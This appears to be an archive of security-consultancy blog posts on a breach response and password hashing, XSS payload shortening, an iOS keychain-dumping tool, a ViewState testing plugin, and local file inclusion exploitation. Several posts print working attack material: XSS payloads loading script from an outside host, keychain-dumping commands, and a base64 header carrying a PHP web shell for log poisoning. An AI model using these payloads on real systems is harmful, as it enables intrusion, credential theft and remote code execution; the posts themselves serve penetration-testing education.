What Kickstarter Did Right

Only a few details have emerged about the recent breach at Kickstarter, but it appears that this one will be a case study in doing things right both before and after the breach.

What Kickstarter has done right:

  • Timely notification
  • Clear messaging
  • Limited sensitive data retention
  • Proper password handling

Timely notification

The hours and days after a breach is discovered are incredibly hectic, and there will be powerful voices both attempting to delay public announcement and attempting to rush it. When users’ information may be at risk beyond the immediate breach, organizations should strive to make an announcement as soon as it will do more good than harm. An initial public announcement doesn’t have to have all the answers, it just needs to be able to give users an idea of how they are affected, and what they can do about it. While it may be tempting to wait for full details, an organization that shows transparency in the early stages of a developing story is going to have more credibility as it goes on.

Clear messaging

Kickstarter explained in clear terms what was and was not affected, and gave straightforward actions for users to follow as a result. The logging and access control groundwork for making these strong, clear statements at the time of a breach needs to be laid far in advance and thoroughly tested. Live penetration testing exercises with detailed post mortems can help companies decide if their systems will be able to capture this critical data.

Limited sensitive data retention

One of the first questions in any breach is “what did they get?”, and data handling policies in place before a breach are going to have a huge impact on the answer. Thinking far in advance about how we would like to be able to answer that question can be a driver for getting those policies in place. Kickstarter reported that they do not store full credit card numbers, a choice that is certainly saving them some headaches right now. Not all businesses have quite that luxury, but thinking in general about how to reduce the retention of sensitive data that’s not actively used can reduce costs in protecting it and chances of exposure over the long term.

Proper password handling (mostly)

Kickstarter appears to have done a pretty good job in handling user passwords, though not perfect. Password reuse across different websites continues to be one of the most significant threats to users, and a breach like this can often lead to ripple effects against users if attackers are able to obtain account passwords.

In order to protect against this, user passwords should always be stored in a hashed form, a representation that allows a server to verify that a correct password has been provided without ever actually storing the plaintext password. Kickstarter reported that their “passwords were uniquely salted and digested with SHA-1 multiple times. More recent passwords are hashed with bcrypt.” When reading breach reports, the level of detail shared by the organization is often telling and these details show that Kickstarter did their homework beforehand.

A strong password hashing scheme must protect against the two main approaches that attackers can use: hash cracking, and rainbow tables. The details of these approaches have been well-covered elsewhere, so we can focus on what Kickstarter used to make their users’ hashes more resistant to these attacks.

To resist hash cracking, defenders want to massively increase the amount of work an attacker has to do to check each possible password. The problem with hash algorithms like SHA1 and MD5 is that they are too efficient; they were designed to be completed in as few CPU cycles as possible. We want the opposite from a password hash function, so that it is reasonable to check a few possible passwords in normal use but computationally ridiculous to try out large numbers of possible passwords during cracking. Kickstarter indicated that they used “multiple” iterations of the SHA1 hash, which multiplies the attacker effort required for each guess (so 5 iterations of hashing means 5 times more effort). Ideally we like to see a hashing attempt take at least 100 ms, which is a trivial delay during a legitimate login but makes large scale hash cracking essentially infeasible. Unfortunately, SHA1 is so efficient that it would take more than 100,000 iterations to raise the effort to that level. While Kickstarter probably didn’t get to that level (it’s safe to assume they would have said so if they did), their use of multiple iterations of SHA1 is an improvement over many practices we see.

To resist rainbow tables, it is important to use a long, random, unique salt for each password. Salting passwords removes the ability of attackers to simply look up hashes in a precomputed rainbow tables. Using a random, unique salt on each password also means that an attacker has to perform cracking on each password individually; even if two users have an identical password, it would be impossible to tell from the hashes. There’s no word yet on the length of the salt, but Kickstarter appears to have gotten the random and unique parts right.

Finally, Kickstarter’s move to bcrypt for more recent passwords is particularly encouraging. Bcrypt is a modern key derivation function specifically designed for storing password representations. It builds in the idea of strong unique salts and a scalable work factor, so that defenders can easily dial up the amount computation required to try out a hash as computers get faster. Bcrypt and similar functions such as PBKDF2 and the newer scrypt (which adds memory requirements) are purpose built make it easy to get password handling right; they should be the go-to approach for all new development, and a high-priority change for any codebases still using MD5 or SHA1.

XSS Shortening Cheatsheet

By Ben Toews

In the course of a recent assessment of a web application, I ran into an interesting problem. I found XSS on a page, but the field was limited (yes, on the server side) to 20 characters. Of course I could demonstrate the problem to the client by injecting a simple <b>hello</b> into their page, but it leaves much more of an impression of severity when you can at least make an alert box.

My go to line for testing XSS is always <script>alert(123123)</script>. It looks somewhat arbitrary, but I use it specifically because 123123 is easy to grep for and will rarely show up as a false positive (a quick Google search returns only 9 million pages containing the string 123123). It is also nice because it doesn’t require apostrophes.

This brings me to the problem. The above string is 30 characters long and I need to inject into a parameter that will only accept up to 20 characters. There are a few tricks for shortening your <script> tag, some more well known than others. Here are a few:

  • If you don’t specify a scheme section of the URL (http/https/whatever), the browser uses the current scheme. E.g. <script src='//btoe.ws/xss.js'></script>
  • If you don’t specify the host section of the URL, the browser uses the current host. This is only really valuable if  you can upload a malicious JavaScript file to the server you are trying to get XSS on. Eg. <script src='evil.js'></script>
  • If you are including a JavaScript file from another domain, there is no reason why its extension must be .js. Pro-tip: you could even have the malicious JavaScript file be set as the index on your server… Eg. <script src='http://btoe.ws'>
  • If you are using IE you don’t need to close the <script> tag (although I haven’t tested this in years and don’t have a Windows box handy). E.g. <script src='http://btoe.ws/evil.js'>
  • You don’t need quotes around your src attribute. Eg. <script src=http://btoe.ws/evil.js></script>

In the best case (your victim is running IE and you can upload arbitrary files to the web root), it seems that all you would need is <script src=/>. That’s pretty impressive, weighing in at only 14 characters. Then again, when will you actually get to use that in the wild or on an assessment? More likely is that you will have to host your malicious code on another domain. I own btoe.ws, which is short, but not quite as handy as some of the five letter domain names. If you have one of those, the best you could do is <script src=ab.cd>. This is 18 characters and works in IE, but let’s assume that you want to be cross-platform and go with the 27 character option of <script src=ab.cd></script>. Thats still pretty short, but we are back over my 20 character limit.

Time to give up? I think not.

Another option is to forgo the <script> tag entirely. After all, ‘script’ is such a long word… There are many one letter HTML tags that accept event handlers. onclick and onkeyup are even pretty short. Here are a couple more tricks:

  • You can make up your own tags! E.g. <x onclick="alert(1)">foo</x>
  • If you don’t close your tag, some events will be inherited by the rest of the page following your injected code. E.g. <x onclick='alert(1)'>.
  • You don’t need to wrap your code in quotes. Eg. <b onclick=alert(1)>foo</b>
  • If the page already has some useful JavaScript (think JQuery) loaded, you can call their functions instead of your own. Eg. If they have a function defined as function a(){alert(1)} you can simply do <b onclick='a()'>foo</b>
  • While onclick and onkeyup are short when used with <b> or a custom tag, they aren’t going to fire without user interaction. The onload event of the <body> tag on the other hand will. I think that having duplicate <body> tags might not work on all browsers, though.  E.g. <body onload='alert(1)'>

Putting these tricks together, our optimal solution (assuming they have a one letter function defined that does exactly what we want) gives us <b onclick=a()>. Similar to the unrealistically good <script> tag example from above, this comes in at 14 characters. A more realistic and useful line might be <b onclick=alert(1)>. This comes it at exactly 20 characters, which is within my limit.

This worked for me, but maybe 20 characters is too long for you. If you really have to be a minimalist, injecting the <b> tag into the page is the smallest thing I can think of that will affect the page without raising too many errors. Slightly more minimalistic than that would be to simply inject <. This would likely break the page, but it would at least be noticable and would prove your point.

This article is by no means intended to provide the answer, but rather to ask a question. I ask, or dare I say challenge, you to find a better solution than what I have shown above. It is also worth noting that I tested most of this on recent versions of Firefox and Chrome, but no other browsers. I am using a Linux box and don’t have access to much else at the moment. If you know that some of the above code does not work in other browsers, please comment bellow and I will make an edit, but please don’t tell me what does and does not work in lynx.

If you want to see some of these in action, copy the following into a file and open it in your your browser or go to http://mastahyeti.com/vps/shrtxss.html.

Edit: albinowax points out that onblur is shorter than onclick or onkeyup.


<html>
<head>
<title>xss example</title>
<script>
//my awesome js
function a(){alert(1)}
</script>
</head>
<body>

<!– XSS Injected here –>
<x onclick=alert(1)>
<b onkeyup=alert(1)>
<x onclick=a()>
<b onkeyup=a()>
<body onload=a()>
<!– End XSS Injection –>

<h1>XSS ROCKS</h1>
<p>click me</p>
<form>
<input value=’try typing in here’>
</form>
</body>
</html>

PS: I did some Googling before writing this. Thanks to those at sla.ckers.org and at gnarlysec.

“Researchers steal iPhone passwords in 6 minutes”…true…but not the whole story

By Patrick Toomey

Direct link to keychaindumper (for those that want to skip the article and get straight to the code)

So, a few weeks ago a wave of articles hit the usual sites about research that came out of the Fraunhofer Institute (yes, the MP3 folks) regrading some issues found in Apple’s Keychain service.  The vast majority of the articles, while factually accurate, didn’t quite present the full details of what the researchers found.  What the researchers actually found was more nuanced than what was reported.  But, before we get to what they actually found, let’s bring everyone up to speed on Apple’s keychain service.

Apple’s keychain service is a library/API provided by Apple that developers can use to store sensitive information on an iOS device “securely” (a similar service is provided in Mac OS X).  The idea is that instead of storing sensitive information in plaintext configuration files, developers can leverage the keychain service to have the operating system store sensitive information securely on their behalf.  We’ll get into what is meant by “securely” in a minute, but at a high level the keychain encrypts (using a unique per-device key that cannot be exported off of the device) data stored in the keychain database and attempts to restrict which applications can access the stored data.  Each application on an iOS device has a unique “application-identifier” that is cryptographically signed into the application before being submitted to the Apple App store.  The keychain service restricts which data an application can access based on this identifier.  By default, applications can only access data associated with their own application-identifier.  Apple realized this was a bit restrictive, so they also created another mechanism that can be used to share data between applications by using “keychain-access-groups”.  As an example, a developer could release two distinct applications (each with their own application-identifier) and assign each of them a shared access group.  When writing/reading data to the keychain a developer can specify which access group to use.  By default, when no access group is specified, the application will use the unique application-identifier as the access group (thus limiting access to the application itself).  Ok, so that should be all we need to know about the Keychain.  If you want to dig a little deeper Apple has a good doc here.

Ok, so we know the keychain is basically a protected storage facility that the iOS kernel delegates read/write privileges to based on the cryptographic signature of each application.  These cryptographic signatures are known as “entitlements” in iOS parlance.  Essentially, an application must have the correct entitlement to access a given item in the keychain.  So, the most obvious way to go about attacking the keychain is to figure out a way to sign fake entitlements into an application (ok, patching the kernel would be another way to go, but that is a topic for another day).  As an example, if we can sign our application with the “apple” access group then we would be able to access any keychain item stored using this access group.  Hmmm…well, it just so happens that we can do exactly that with the “ldid” tool that is available in the Cydia repositories once you Jailbreak your iOS device.  When a user Jailbreak’s their phone, the portion of the kernel responsible for validating cryptographic signatures is patched so that any signature will validate. So, ldid basically allows you to sign an application using a bogus signature. But, because it is technically signed, a Jailbroken device will honor the signature as if it were from Apple itself.

Based on the above descrption, so long as we can determine all of the access groups that were used to store items in a user’s keychain, we should be able to dump all of them, sign our own application to be a member of all of them using ldid, and then be allowed access to every single keychain item in a user’s keychain.  So, how do we go about getting a list of all the access group entitlements we will need?  Well, the kechain is nothing more than a SQLite database stored in:

/var/Keychains/keychain-2.db

And, it turns out, the access group is stored with each item that is stored in the keychain database.  We can get a complete list of these groups with the following query:

SELECT DISTINCT agrp FROM genp

Once we have a list of all the access groups we just need to create an XML file that contains all of these groups and then sign our own application with ldid.  So, I created a tool that does exactly that called keychain_dumper.  You can first get a properly formatted XML document with all the entitlements you will need by doing the following:

./keychain_dumper -e > /var/tmp/entitlements.xml

You can then sign all of these entitlments into keychain_dumper itself (please note the lack of a space between the flag and the path argument):

ldid -S/var/tmp/entitlements.xml keychain_dumper

After that, you can dump all of the entries within the keychain:

./keychain_dumper

If all of the above worked you will see numerous entries that look similar to the following:

Service: Dropbox
Account: remote
Entitlement Group: R96HGCUQ8V.*
Label: Generic
Field: data
Keychain Data: SenSiTive_PassWorD_Here

Ok, so what does any of this have to do with what was being reported on a few weeks ago?  We basically just showed that you can in fact dump all of the keychain items using a jailbroken iOS device.  Here is where the discussion is more nuanced than what was reported.  The steps we took above will only dump the entire keychain on devices that have no PIN set or are currently unlocked.  If you set a PIN on your device, lock the device, and rerun the above steps, you will find that some keychain data items are returned, while others are not.  You will find a number of entries now look like this:

Service: Dropbox
Account: remote
Entitlement Group: R96HGCUQ8V.*
Label: Generic
Field: data
Keychain Data: <Not Accessible>

This fundamental point was either glossed over or simply ignored in every single article I happend to come across (I’m sure at least one person will find the article that does mention this point :-)).  This is an important point, as it completely reframes the discussion.  The way it was reported it looks like the point is to show how insecure iOS is.  In reality the point should have been to show how security is all about trading off various factors (security, convenience, etc).  This point was not lost on Apple, and the keychain allows developers to choose the appropriate level of security for their application.  Stealing a small section from the keychain document from Apple, they allow six levels of access for a given keychain item:

CFTypeRef kSecAttrAccessibleWhenUnlocked;
CFTypeRef kSecAttrAccessibleAfterFirstUnlock;
CFTypeRef kSecAttrAccessibleAlways;
CFTypeRef kSecAttrAccessibleWhenUnlockedThisDeviceOnly;
CFTypeRef kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly;
CFTypeRef kSecAttrAccessibleAlwaysThisDeviceOnly;

The names are pretty self descriptive, but the main thing to focus in on is the “WhenUnlocked” accessibility constants.  If a developer chooses the “WhenUnlocked” constant then the keychain item is encrypted using a cryptographic key that is created using the user’s PIN as well as the per-device key mentioned above.  In other words, if a device is locked, the cryptographic key material does not exist on the phone to decrypt the related keychain item.  Thus, when the device is locked, keychain_dumper, despite having the correct entitlements, does not have the ability to access keychain items stored using the “WhenUnlocked” constant.  We won’t talk about the “ThisDeviceOnly” constant, but it is basically the most strict security constant available for a keychain item, as it prevents the items from being backed up through iTunes (see the Apple docs for more detail).

If a developer does not specify an accessibility constant, a keychain item will use “kSecAttrAccessibleWhenUnlocked”, which makes the item available only when the device is unlocked.  In other words, applications that store items in the keychain using the default security settings would not have been leaked using the approach used by Fraunhofer and/or keychain_dumper (I assume we are both just using the Keychain API as it is documented).  That said, quite a few items appear to be set with “kSecAttrAccessibleAlways”.  Such items include wireless access point passwords, MS Exchange passwords, etc.  So, what was Apple thinking; why does Apple let developers choose among all these options?  Well, let’s use some pretty typical use cases to think about it.  A user boots their phone and they expect their device to connect to their wireless access point without intervention.  I guess that requires that iOS be able to retrieve their access point’s password regardless of whether the device is locked or not.  How about MS Exchange?  Let’s say I lost my iPhone on the subway this morning.  Once I get to work I let the system administrator know and they proceed to initiate a remote wipe of my Exchange data.  Oh, right, my device would have to be able to login to the Exchange server, even when locked, for that to work.  So, Apple is left in the position of having to balance the privacy of user’s data with a number of use cases where less privacy is potentially worthwhile.  We can probably go through each keychain item and debate whether Apple chose the right accessibility constant for each service, but I think the main point still stands.

Wow…that turned out to be way longer than I thought it would be.  Anyway, if you want to grab the code for keychain_dumper to reproduce the above steps yourself you can grab the code on github.  I’ve included the source as well as a binary just in case you don’t want/have the developer tools on your machine.  Hopefully this tool will be useful for security professionals that are trying to evaluate whether an application has chosen the appropriate accessibility parameters during blackbox assessments. Oh, and if you want to read the original paper by Fraunhofer you can find that here.

ViewStateViewer: A GUI Tool for deserializing/reserializing ViewState

By: Patrick Toomey

Background

So, I was reading the usual blogs and came across a post by Mike Tracy from Matasano (Matasano has been having some technical difficulties…this link should work once they have recovered).  In the blog post Mike talks about the development of a ViewState serializer/deserializer for his WWMD web application security assessment console  (please see Mike’s original post for more details).  Mike noted that the tools for viewing/manipulating ViewState from an application testing perspective are pretty weak, and I can’t agree more.  There are a number of ViewState tools floating around that do a tolerable job of taking in a Base64 encoded ViewState string and presenting the user with a static view of the deserialized object. However, no tools up until this point, save for Mike’s new implementation, have allowed a user to change the values within the deserialized object and then reserialize them into a new Base64 string. Mike’s tool does exactly this, and is immensely useful for web application testing. The only downside to Mike’s tools is that it is built for his workflow and not mine (how can I fault the man for that).  So, I decided to build an equivalent that works well for me (and hopefully for you as well).

I tend to have a web proxy of some sort running on my machine throughout the day. There are tons of them out there and everyone seems to have their personal favorite. There is Paros, WebScarab, BurpSuite, and I am sure many others. In the last few months I have been using a newer entrant into the category, Fiddler.  Fiddler is a great web proxy whose only big drawback is that it is Windows only.  However, at least for me, the upsides to Fiddler tend to outweigh the negatives.  Fiddler has a fairly refined workflow (don’t get me started on WebScarab), is stable (don’t get me started on Paros), and is pretty extensible.  There are a number of ways to extend Fiddler, most trivially using their own FiddlerScript hooks.  In addition, there is a public API for extending the application using .NET.  Fiddler has a number of interfaces that can be extended to allow for inspecting and manipulating requests or responses. Please see the Fiddler site for more details on extending Fiddler using either FiddlerScript or .NET.  In particular, take a look at the development section to get a better feel for the facilities provided by Fiddler for extending the application.

Anyway, I had been thinking about writing a ViewState serializer/deserializer for Fiddler for the past month or two when I saw Mike’s blog post.  I decided that it was about time to set aside a little time and write some code.  I was lucky that Fiddler uses .NET, as I was able to leverage all of the system assemblies that Mike had to decompile in Reflector. After a bit of coding I ended up with my ViewStateViewer Fiddler inspector.  Let’s take a quick tour…

ViewStateViewer seamlessly integrates into the Fiddler workflow, allowing a user to manipulate ViewState just as they would any other variable in a HTTP request.  An extremely common scenario for testing involves submitting a request in the browser, trapping the request in a proxy, changing a variable’s value, and forwarding the request on to the server. ViewStateViewer tries to integrate into this workflow as seamlessly as possible.  Upon trapping a request that contains ViewState, ViewStateViewer extract the Base64 encoded ViewState, Base64 decodes it, deserializes the ViewState, and allows a user to manipulate the ViewState as they would any other variable sent to the server.  Let’s take a look at some screenshots to get a better idea of how this works.

ViewStateViewer Tour

Serialized ViewStateSerialized ViewState

By Default, Fiddler lets a user trap requests and view/edit a POST body before submitting the request to the server.  In this case, the POST body contains serialized ViewState that we would like to work with.  Without ViewStateViewer this is non-trivial, as Fiddler only shows us the Base64 encoded serialization.

Deserialized ViewStateDeserialized ViewState

ViewStateViewer adds a new “ViewState” tab within Fiddler that dynamically identifies and deserializes ViewState on the fly.  The top half of the inspector shows the original Base64 serialized ViewState string.  The bottom half of the inspector shows an XML representation of the deserialized ViewState.  In between these two views the user can see if the ViewState is MAC protected and the version of the ViewState being deserialized.  In this case we can see that this is .NET 2.X ViewState and that MAC protection is not enabled.

ReSerialized ViewStateReserialized ViewState

Once the ViewState is deserialized we can manipulate the ViewState by changing the values in the XML representation.  In this example we changed one of the string values to “foobar”, as can be seen in the figure above.  Once we change the value we can reserialize the ViewState using the “encode” button.  The reserialized Base64 encoded ViewState string can be seen in the top half of the ViewStateViewer window.  Once we have “encoded” the ViewState with our modifications, ViewStateViewer automatically updates the POST body with the new serialized ViewState string.  This request can now be “Run to Completion”, which lets Fiddler submit the updated request to the server.

Limitations

It should be noted that if the original ViewState had used MAC protection ViewStateViewer would not be able to reserialize the manipulated ViewState with a valid MAC.  While ViewStateViewer will not prevent you from deserializing, manipulating, and reserializing MAC protected ViewState, it will not be able to append a valid MAC to modified ViewState.  ViewStateViewer will warn us that “Modified ViewState does not contain a valid MAC”.  Modified requests made using reserialized MAC protected ViewState will ultimately fail, as we don’t know the machine key used to produce a valid MAC.  Regardless, sometimes simply being able to view what is being stored in MAC protected ViewState can be useful during an application assessment.

In addition to MAC protection, ViewState can be optionally protected using encryption.  Encryption will prevent any attempt by ViewStateViewer to deserialize the ViewState.  If encryption is detected ViewStateViewer will simply show the user the original Base64 ViewState string.  However, as any application security consultant can attest, there are many applications that do not encrypt or MAC protect their ViewState.  ViewStateViewer is aimed squarely at these use cases.

Finally, ViewStateViewer was written entirely with deserializing/serializing ViewState 2.X in mind. While ViewState 1.X is supported, the support at this time is limited, though completely functional. ViewState 1.X, unlike ViewState 2.X, Base64 decodes into a completely human readable ASCII based serialization format (think JSON).  As such, ViewStateViewer simply Base64 decodes ViewState 1.X and displays the result to the user. The user is then free to make any changes they wish to the decoded ViewState. This works exactly the same as the example shown above, except that the decoded ViewState object will not be a nicely formatted XML document. I might get around to adding true ViewState 1.X support, but the benefits would be purely cosmetic, as the current implementation has no functional limitations.

Wrap Up

ViewState is one of those areas that tends to be under-tested during application assessments, as there have been no good tools for efficiently evaluating the effects of modifying ViewState.  Hopefully the release of ViewStateViewer will make evaluation of ViewState a more common practice.  If you want to give ViewStateViewer a try you can download the Fiddler plugin(with source) here. Simply copy ViewStateViewer.dll into your “Inspectors” folder within your Fiddler install directory.  It should be noted that this inspector is for Fiddler2, so please update your copy of Fiddler if you are out of date.  Finally, this is very much a work in progress.  As I found out during development, there is ton of ViewState out there that is either non-trivial to deserialize/reserialize or is impossible to deserialize/reserialize (non-standard objects being serialized for example).  Maybe I’ll do another blog post detailing some of these difficult/impossible to handle edge cases in a subsequent post.  So, while I have done some limited testing, I am sure there are some bugs that will crop up.  If you happen to find one please don’t hesitate to contact me.

Local File Inclusion – Tricks of the Trade

By: Cris Neckar, Andrew Case

Everyone understands that local file includes are bad. The ability to execute an arbitrary file as code is unquestionably a security risk and should be protected against. However, the process of exploitation can be rather involved and is commonly misunderstood. In this post I want to clarify the risks involved in this type of vulnerability and the complications involved in exploitation.

To start lets give a bit of background. I will focus on PHP on Linux specifically but this class of vulnerability may also exist in many other interpreted languages on different platforms. Generically, a file inclusion vulnerability is the dynamic execution of interpreted code loaded from a file. This file could be loaded remotely from an http/ftp server in the case of remote inclusions, or as I will cover, locally from disk. Generally remote file inclusion vulnerabilities are trivial to exploit so I will not be covering them. The following line is an example of a local file inclusion vulnerability in PHP:

require_once($LANG_PATH . ‘/’ . $_GET[‘lang’] . ‘.php’);

In this case an attacker controls the “lang” variable and can thereby force the application to execute an arbitrary file as code. The attacker does not however control the beginning of the require_once() argument, so including a remote file would not be possible. To exploit this an attacker would set the ‘lang’ variable to a value similar to the following:

lang=../../../../../../file/for/inclusion%00

Before we get into discussing the exploitation of this type of vulnerability let me say a few words about preventing them. In the preceding case, the vulnerability could be trivially mitigated through input validation. A simple check for non-alphanumeric characters would suffice in this case. However, where possible I would recommend completely avoiding user input for this type of logic and instead selecting the proper include from a hardcoded list of known good files based on a user supplied index number or hash.

Now that we know how to avoid these when developing applications lets get back to methods of exploitation. A straight forward vulnerability such as this one can in fact be quite difficult to reliably exploit given the differences in deployment platforms. When developing an exploit the first question to ask yourself is generally “what do I need for successful exploitation?”. In this case, the answer to that question is a file stored locally on the target system which contains PHP code that accomplishes our goal. In the best case we will be able to include a file which we directly control the contents of.

This can be an interesting puzzle as it is almost a case of chicken before the egg. To gain access to the remote system we need the ability to create a file on the remote system. The first possibility, and by far the simplest, is to look at the features provided by the application we are attacking. For example, many local inclusion exploits use features such as custom avatars and file storage mechanisms to place code on the target system. Bypassing various checks performed on these types of files/images can be an interesting puzzle in itself and the details are best saved for a future post. However, we want to talk about these vulnerabilities on systems which do not allow such trivial exploitation.

If the target application does not provide some way of uploading or changing a file on disk we need to examine other options. I suggest examining all access to the target server. Ask yourself “What services are available to me and what files to they access? Do I control any of the data written to these files?”. An anonymous FTP server or similar would certainly make life easier here but that would be to good to be true. :)

Generally when people discuss local includes the assumption is that the target file will be the HTTP servers logs. It is quite easy to influence the contents of log files as their purpose is to store the requests that you, the user, make. Most people will suggest the logs and conveniently glaze over the complexities that their usage presents. There are several major potential hurdles in the use of logs.

First we run into the problem of finding the logs. In a production environment it is rare to use default paths for log data, ‘/var/log/httpd/access_log’ is simple enough to guess but what do you do when the log is stored in ‘/vol001/appname.ourwidget.com/log’. Guessing this path would be non-trivial at best and even assuming that verbose error messages or a similar information disclosure gives you some hint to directory structure, using these methods in a reliable exploit would be extremely difficult.

To jump this hurdle lets examine an interesting feature of the Linux proc file-system, namely, the ‘self’ link. The Linux kernel exports a good bit of interesting information about individual processes to usermode through the proc entries for each process id. It also creates an entry called ‘self’ which provides a process easy access to its own process information. When we access /proc/self through the context of a PHP include the link will, in most cases, point to the process entry for the httpd child which has instantiated to PHP interpreter library (This may not be the case if the interpreter has been called as CGI). Often when an HTTPd is run, the path to its configuration file is passed as an argument. If this is the case, finding the log file is a simple procedure of including ‘/proc/self/cmdline’, reading the location of the configuration file and including it to find the path to log files.

Viewing the apache cmdline proc entry

Viewing the apache cmdline proc entry

If the ‘cmdline’ entry does not contain the configuration file there is another option. The per process proc entry also contains a directory entry called ‘fd’. This directory exports a numbered entry for each file descriptor that the process currently holds. In writing PoC for this post on a 2.6.20 kernel we noticed that at some point a kernel developer had the foresight to set the permissions on these entries so that they could be read only by the instantiating user. We tasked intern Y with finding the change and, after grepping the diffs of every kernel release (ever… i.e. wget -r –no-parent http://www.kernel.org/pub/linux/kernel/) he found the following. In May of 2007 the following patch was entered to address the case where a process opens a file and then drops its permissions (Interesting, that is exactly what Apache does).

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=8948e11f450e6189a79e47d6051c3d5a0b98e3f3

This change was committed around the release of version 2.6.22. Using this new access we are able to directly access the files opened by the apache process through these proc entries. By iterating the file name from ‘0’ we are able to directly access the HTTPd log file which will undoubtedly be open for use by the web server. Simply include the files ‘/proc/self/fd/<fd number>’ until you hit on the right file descriptor.

Using the fd proc entries to access apache logs

Using the fd proc entries to access apache logs

Great, so we found the log file. Now we need to determine what fields we actually control. It is commonly believed that you can arbitrarily enter text into apache logs by putting code into GET variables or the requested path. This is generally not the case as these values will almost always be URL encoded and will therefore not execute correctly. I find the simplest field to use is actually the user name. This is pulled from the Authorization header which is typically base64 encoded and thereby avoids the URL encoding mechanisms. By base64 encoding a string similar to the following:

<?php passthru($_GET[‘cmd’]); ?>:doesn’t matter

And specifying an Authorization header as follows:

Authorization: Basic PD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTsgPz46ZG9lc24ndCBtYXR0ZXI=

We can insert arbitrary code into the HTTP logs.

PHP code as basic auth username

PHP code as basic auth username

Assuming the stars align and this method is successful there is still one more caveat. On production HTTP servers the logs files tend to be rather large, often in the range of 200mb. Your PHP code is going to be at the very end of the current log file which will likely mean that for each command you run it will take a very long time (depending on connection speed) to wait for the page to display the output from your command. It is possible to use the error_log as this is likely somewhat smaller, but these can still be rather larger than we would hope.

We now have somewhat reliable ways to get code execution, but I hear you saying “There must be a better way”. I am going to present a method which is specific to PHP and somewhat specific to the target application. This is a very common scenario but if it does not fit your needs I hope that it will at least help you to get into the right mindset for this type of exploit development.

PHP provides a mechanism for maintaining session state across requests. Many other languages provide similar interfaces but their internals are sometimes quite different. In the case of PHP a session is started using, logically enough, session_start(). This code can be found is ‘/ext/session/session.c’ within the PHP codebase. Briefly, it checks whether a session cookie was sent with the current request, if not it creates a random session id and sets the cookie within the response to the user. It also registers the global $_SESSION variable which is directly tied to a file stored in the temporary directory. This file will contain any variables set under the session context formatted as a PHP array.

In the case of an application which tracks session information, any setting stored as a string which the user controls could provide an excellent target for a local file include vulnerability. The session file will be named ‘sess_<session_id>’. Although the session_id is a random hash it is trivial to retrieve as it is stored locally in a cookie.

Viewing the PHP session cookie

Viewing the PHP session cookie

In our simple example, our session has a few variables but the simplest to control arbitrarily is a field called ‘signature’. PHP applications tend to store all sorts of interesting things in session variables and there is often a string that you control arbitrarily. In this case by setting our ‘signature’ to PHP code we can gain command execution through this session file.

Putting it all together

Putting it all together

Although the specific methods I have outlined here will not always work in your particular situation I hope that I have at least prompted some interest in the many possibilities for exploiting this type of vulnerability. Regardless of how limited you feel by the platform you are exploiting there is almost always some trick that you can use to get the better of the system.

Weak Application Security = Non-Compliance

I had to post about this one – our general counsel and compliance specialist Dave Stampley wrote an article recently at Information Week about the importance of ensuring application security as part of your regulatory compliance efforts. From the article:

Web-application security vulnerabilities pose a unique compliance risk for companies. Unlike compliance failures that take place in the background–for example, an unencrypted business-to-business transmission of sensitive consumer data–application weaknesses are open to discovery by any skilled Web surfer and even consumers themselves.

“The FTC appears to be taking a strict liability approach to E-commerce security flaws,” says Mary Ellen Callahan, an attorney at Hogan & Hartson in Washington, D.C., who has represented clients facing government privacy compliance investigations. “White-hat hackers and tipsters have prompted a number of enforcement actions by reporting Web-site flaws they discovered.”

Read the full article here